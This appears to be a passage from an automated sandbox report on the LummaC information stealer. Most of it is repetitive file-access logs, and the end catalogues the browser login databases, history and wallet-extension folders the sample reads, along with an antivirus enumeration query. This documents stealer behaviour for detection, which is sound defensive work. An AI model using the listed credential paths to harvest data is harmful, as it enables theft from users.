      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI78242\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeQueries volume information: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0027AFFD GetSystemTimeAsFileTime,6_2_0027AFFD
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0069D983 _free,GetTimeZoneInformation,16_2_0069D983
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003128D0 GetVersion,GetModuleHandleW,GetProcAddress,6_2_003128D0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
